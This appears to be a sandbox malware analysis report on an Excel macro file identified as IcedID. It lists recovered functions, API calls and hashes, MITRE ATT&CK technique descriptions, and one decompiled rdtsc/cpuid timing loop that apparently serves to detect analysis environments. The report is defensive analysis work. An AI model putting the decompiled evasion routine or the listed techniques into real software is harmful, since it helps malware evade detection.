API ID: AllocVirtual
String ID: @
API String ID: 4275171209-2766056989
Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01

Uniqueness

Uniqueness Score: -1.00%

Function 003F10AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 003F10B7
RtlExitUserProcess.NTDLL ref: 003F10C8

Memory Dump Source

Source File: 00000004.00000002.2091871430.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Similarity

API ID: ExitProcessSleepUser
String ID:
API String ID: 354099737-0
Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
Instruction ID: f93c24a24bf52a23ded2c61eae4ad3b2bafbebb7a70104a3de3c6722038ebbb3
Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
Instruction Fuzzy Hash: 53C00221905A8BC2E25F9765BA5973A626DA740709F110629830685AE0CF3956D88646

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB3100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000007FEF8FB327B

Memory Dump Source

Source File: 00000004.00000002.2093632340.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2093629411.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093649510.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093692333.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093699184.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40

Uniqueness

Uniqueness Score: -1.00%

Function 003F260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,003F1E13), ref: 003F264B

Memory Dump Source

Source File: 00000004.00000002.2091871430.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
Instruction ID: 15f76545ec8bc29a3c763060e7155a4f823ba7243fcb89522830001539ebd24d
Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
Instruction Fuzzy Hash: DEE09262B24547C2DF12EB20E8443FA3324FB84704F840132864E42664EF2CC75EC704

Uniqueness

Uniqueness Score: -1.00%

Function 003F1000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 003F1022

Memory Dump Source

Source File: 00000004.00000002.2091871430.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
Instruction ID: 5bbecf094df07944659a95f3920b107608437180192a8f9b00cd9a9fb12de2c4
Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
Instruction Fuzzy Hash: E1D0A772E10282C3E731C710FA167AA6315F3E4315F804216C64944554CF3CC258C600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000007FEF8FB15D0, Relevance: 1.7, Strings: 1, Instructions: 430COMMON

Download Yara Rule

Strings

%, xrefs: 000007FEF8FB17B2

Memory Dump Source

Source File: 00000004.00000002.2093632340.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2093629411.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093649510.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093692333.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093699184.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB41BF, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2093632340.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2093629411.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093649510.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093692333.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2093699184.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003F1E50, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E003F1E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}

0x003f1e50
0x003f1e50
0x003f1e50
0x003f1e50
0x003f1e55
0x003f1e5a
0x003f1e5f
0x003f1e60
0x003f1e6b
0x003f1e6b
0x003f1e71
0x003f1e73
0x003f1e84
0x003f1e86
0x003f1e8a
0x003f1e8e
0x003f1e92
0x003f1e96
0x003f1e98
0x003f1e9f
0x003f1ea2
0x003f1ea5
0x003f1eab
0x003f1ead
0x003f1eb8
0x003f1eba
0x003f1ec1
0x003f1ec4
0x003f1ec7
0x003f1ec7
0x003f1ee9

Memory Dump Source

Source File: 00000004.00000002.2091871430.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
Instruction ID: 25c55fe3e22981eb92bca956eeb79e33a63955be3e1c2f3cf46442731c9b3cf8
Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
Instruction Fuzzy Hash: 3301B172B24B908BDF248F36B60035AB6A2F38D7C4F148535EB9C43B18DA3CD5958B04

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report PI-9823472110866.xlsm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: IcedID

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Function 003F27BC, Relevance: 3.1, APIs: 2, Instructions: 87
COMMON

Function 003F2434, Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Function 003F1E50, Relevance: .0, Instructions: 47
COMMON